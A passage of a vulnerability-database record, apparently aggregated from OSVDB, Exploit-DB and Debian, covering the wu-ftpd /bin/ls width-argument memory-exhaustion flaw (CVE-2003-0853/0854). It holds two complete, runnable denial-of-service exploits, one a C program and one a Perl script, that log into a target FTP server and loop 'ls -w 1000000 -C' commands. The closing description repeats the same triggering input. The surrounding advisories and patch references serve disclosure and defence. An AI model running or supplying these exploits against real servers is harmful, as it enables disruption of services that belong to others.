"2017-04-28T13:19:59", "bulletinFamily": "software", "cvelist": ["CVE-2003-0854"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf)\n[Secunia Advisory ID:10126](https://secuniaresearch.flexerasoftware.com/advisories/10126/)\n[Secunia Advisory ID:14834](https://secuniaresearch.flexerasoftware.com/advisories/14834/)\n[Secunia Advisory ID:17069](https://secuniaresearch.flexerasoftware.com/advisories/17069/)\n[Related OSVDB ID: 4621](https://vulners.com/osvdb/OSVDB:4621)\nRedHat RHSA: RHSA-2003:310\nRedHat RHSA: RHSA-2003:309\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00085.html\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000768\nOther Advisory URL: http://www.turbolinux.com/security/TLSA-2003-60.txt\nOther Advisory URL: http://www.guninski.com/binls.html\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000771\nOther Advisory URL: http://www.debian.org/security/2005/dsa-705\nOther Advisory URL: http://mail.immunix.com/pipermail/immunix-announce/2003-October/0087.html\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf\nOther Advisory URL: http://www.securityfocus.com/advisories/6014\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:106\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2003-q4/1313.html\nMail List Post: http://mail.gnu.org/archive/html/bug-coreutils/2003-10/msg00070.html\nKeyword: Georgi Guninski security advisory #62\n[CVE-2003-0854](https://vulners.com/cve/CVE-2003-0854)\n", "modified": "2003-05-16T14:37:06", "published": "2003-05-16T14:37:06", "href": "https://vulners.com/osvdb/OSVDB:4620", "id": "OSVDB:4620", "type": "osvdb", "title": "fileutils/coreutils ls -w Argument WU-FTPD Memory Consumption DoS", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:59", "bulletinFamily": "software", "cvelist": ["CVE-2003-0853"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf)\n[Secunia Advisory ID:17069](https://secuniaresearch.flexerasoftware.com/advisories/17069/)\n[Related OSVDB ID: 4620](https://vulners.com/osvdb/OSVDB:4620)\nOther Advisory URL: http://mail.immunix.com/pipermail/immunix-announce/2003-October/0087.html\n[CVE-2003-0853](https://vulners.com/cve/CVE-2003-0853)\n", "modified": "2003-05-16T14:37:06", "published": "2003-05-16T14:37:06", "href": "https://vulners.com/osvdb/OSVDB:4621", "id": "OSVDB:4621", "type": "osvdb", "title": "ls -w Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:44:42", "description": "wu-ftpd 2.6.2 Remote Denial Of Service Exploit (wuftpd-freezer.c). CVE-2003-0854. Dos exploit for linux platform", "published": "2003-10-31T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.6.2 - Remote Denial of Service Exploit wuftpd-freezer.c", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0854"], "modified": "2003-10-31T00:00:00", "id": "EDB-ID:115", "href": "https://www.exploit-db.com/exploits/115/", "sourceData": "/*\r\n* (c) Rosiello Security\r\n*\r\n* Copyright Rosiello Security 2003\r\n* All Rights reserved.\r\n*\r\n* Tested on Red Hat 9.0\r\n*\r\n* Author: Angelo Rosiello\r\n* Mail : angelo rosiello org\r\n* This software is only for educational purpose.\r\n* Do not use it against machines different from yours.\r\n* Respect law.\r\n*\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <string.h>\r\n\r\nvoid addr_initialize( );\r\nvoid usage( );\r\n\r\nint main( int argc, char **argv )\r\n{\r\n\tint i, sd, PORT, loop, error;\r\n\tchar user[30], password[30], ch;\r\n\tstruct sockaddr_in server_addr;\r\n\r\n fprintf( stdout, \"\\n(c) Rosiello Security 2003\\n\" );\r\n fprintf( stdout, \"http://www.rosiello.org\\n\" );\r\n fprintf( stdout, \"WU-FTPD 2.6.2 Freezer by Angelo Rosiello\\n\\n\" );\r\n\r\n\tif( argc != 6 ) usage( argv[0] );\r\n\r\n\tif( strlen( argv[3] ) > 20 ) exit( 0 );\r\n\tif( strlen( argv[4] ) > 20 ) exit( 0 );\r\n\r\n\tsprintf( user, \"USER %s\\n\", argv[3] );\r\n\tsprintf( password, \"PASS %s\\n\", argv[4] );\r\n\r\n\tPORT = atoi( argv[2] );\r\n\tloop = atoi( argv[5] );\r\n\r\n\taddr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));\r\n\tsd = socket( AF_INET, SOCK_STREAM, 0 );\r\n\r\n \terror = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));\r\n\tif( error != 0 )\r\n\t{\r\n\t\tperror( \"Something wrong with the connection\" );\r\n\t\texit( 0 );\r\n\t}\r\n\r\n\twhile ( ch != '\\n' )\r\n {\r\n recv( sd, &ch, 1, 0);\r\n printf(\"%c\", ch );\r\n }\r\n\r\n\tch = '\\0';\r\n\r\n\tprintf( \"Connection executed, now waiting to log in...\\n\" );\r\n\r\n\tprintf( \"%s\", user );\r\n\r\n\tsend( sd, user, strlen( user ), 0 );\r\n\twhile ( ch != '\\n' )\r\n\t{\r\n\t\trecv( sd, &ch, 1, 0);\r\n\t\tprintf(\"%c\", ch );\r\n\t}\r\n\tprintf( \"%s\", password );\r\n\r\n\tch = '\\0';\r\n\r\n \tsend( sd, password, strlen( password ), 0 );\r\n while ( ch != '\\n' )\r\n {\r\n recv( sd, &ch, 1, 0);\r\n printf(\"%c\", ch );\r\n }\r\n\r\n\tprintf( \"Sending the DoS query\\n\" );\r\n\tfor( i=0; i<loop; i++ )\r\n\t{\r\n\t\twrite( sd, \"LIST -w 1000000 -C\\n\", 19 );\r\n\t}\r\n\tprintf( \"All done\\n\" );\r\n\tclose( sd );\r\n\treturn 0;\r\n}\r\n\r\nvoid addr_initialize (struct sockaddr_in *address, int port, long IPaddr)\r\n{\r\n \taddress -> sin_family = AF_INET;\r\n \taddress -> sin_port = htons((u_short)port);\r\n \taddress -> sin_addr.s_addr = IPaddr;\r\n}\r\n\r\nvoid usage( char *program )\r\n{\r\n\tfprintf(stdout, \"USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\\n\", program);\r\n \texit(0);\r\n}\r\n\n\n// milw0rm.com [2003-10-31]\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/115/"}, {"lastseen": "2016-02-02T20:39:26", "description": "Coreutils 4.5.x LS Width Argument Integer Overflow Vulnerability. CVE-2003-0853. Dos exploit for linux platform", "published": "2003-10-22T00:00:00", "type": "exploitdb", "title": "Coreutils 4.5.x LS Width Argument Integer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0853"], "modified": "2003-10-22T00:00:00", "id": "EDB-ID:23274", "href": "https://www.exploit-db.com/exploits/23274/", "sourceData": "source: http://www.securityfocus.com/bid/8875/info\r\n\r\nCoreutils 'ls' has been reported prone to an integer overflow vulnerability. The issue reportedly presents itself when handling width and column display command line arguments. It has been reported that excessive values passed as a width argument to 'ls' may cause an internal integer value to be misrepresented. Further arithmetic performed based off this misrepresented value may have unintentional results.\r\n\r\nAdditionally it has been reported that this vulnerability may be exploited in software that implements and invokes the vulnerable 'ls' utility to trigger a denial of service in the affected software. \r\n\r\n#!/usr/bin/perl\r\n\r\n# DoS sploit for ls \r\n# tested against wu-ftpd 2.6.2\r\n\r\n# coded by (c) druid \r\n# greets to viator\r\n\r\nuse Net::FTP;\r\n\r\n(($target = $ARGV[0])&&($count = $ARGV[1])) || die \"usage:$0 <target> <count>\";\r\nmy $user = \"anonymous\";\r\nmy $pass = \"halt\\@xyu.com\";\r\n$cols=1000000;#you can increase this value for more destructive result ;)\r\n\r\n\r\nprint \":: Trying to connect to target system at: $target...\\n\"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die \"could not \r\nconnect: $!\";\r\nprint \"Connected!\\n\";\r\n$ftp->login($user, $pass) || die \"could not login: $!\"; \r\nprint \"Logged in!\\n\";\r\n$ftp->cwd(\"/\");\r\nwhile ($count)\r\n{\r\n$ftp->ls(\"-w $cols -C\");\r\n $count--; \r\n}\r\nprint \"Done!\\n\";\r\n$ftp->quit; \r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23274/"}], "debian": [{"lastseen": "2020-11-11T13:25:25", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0256", "CVE-2003-0854"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 705-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 4th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : wu-ftpd\nVulnerability : missing input sanitising\nProblem-Type : remote\nDebian-specific: no\nCVE IDs : CAN-2005-0256 CAN-2003-0854\n\nSeveral denial of service conditions have been discovered in wu-ftpd,\nthe popular FTP daemon. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCAN-2005-0256\n\n Adam Zabrocki discovered a denial of service condition in wu-ftpd\n that could be exploited by a remote user and cause the server to\n slow down the server by resource exhaustion.\n\nCAN-2003-0854\n\n Georgi Guninski discovered that /bin/ls may be called from within\n wu-ftpd in a way that will result in large memory consumption and\n hence slow down the server.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.6.2-3woody5.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 2.6.2-19.\n\nWe recommend that you upgrade your wu-ftpd package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5.dsc\n Size/MD5 checksum: 607 78463b3882e0d32102344bb0580e0d98\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5.diff.gz\n Size/MD5 checksum: 101661 967b719c02892c867ad0d6456a5dd47a\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2.orig.tar.gz\n Size/MD5 checksum: 354784 b3c271f02aadf663b8811d1bff9da3f6\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd-academ_2.6.2-3woody5_all.deb\n Size/MD5 checksum: 3484 cc6ee1aeb156077af311870f095840ab\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_alpha.deb\n Size/MD5 checksum: 292630 c164f9f2d0ae5d70587ca49ddbe543b4\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_arm.deb\n Size/MD5 checksum: 265840 c86cdbc78969f755dce0facce4a1f882\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_i386.deb\n Size/MD5 checksum: 255216 504af14aec48191405c08a56845d330b\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_ia64.deb\n Size/MD5 checksum: 321932 ced4192d937ccedfa5a7ab2e9e77c378\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_hppa.deb\n Size/MD5 checksum: 276624 4a1b5b6115ed1d93206c9787e8d37038\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_m68k.deb\n Size/MD5 checksum: 249810 e873e950d3b234a7854ee0e4810783f5\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_mips.deb\n Size/MD5 checksum: 273426 364c07d6a21f8aab43b3841ce98df8c6\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_mipsel.deb\n Size/MD5 checksum: 273568 4e51f44342035b6ecafc624b1a6c06f3\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_powerpc.deb\n Size/MD5 checksum: 268816 4072fbbb73bd8013b9a191f3aa7bd778\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_s390.deb\n Size/MD5 checksum: 263638 d86fc84ab2974a80fd7407d826d8b003\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_sparc.deb\n Size/MD5 checksum: 270784 1110401bccc9035cc1b30eb8146aee18\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2005-04-04T00:00:00", "published": "2005-04-04T00:00:00", "id": "DEBIAN:DSA-705-1:CDBB7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00085.html", "title": "[SECURITY] [DSA 705-1] New wu-ftpd packages fix denial of service", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}

WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS

Description

The version of WU-FTPD on the remote server uses a vulnerable version of /bin/ls. It does not filter arguments to /bin/ls, which could lead to a DoS. It is possible to consume all available memory on the machine by sending : ls '-w 1000000 -C'

The version of WU-FTPD on the remote server uses a vulnerable version of /bin/ls. It does not filter arguments to /bin/ls, which could lead to a DoS. It is possible to consume all available memory on the machine by sending :

ls '-w 1000000 -C'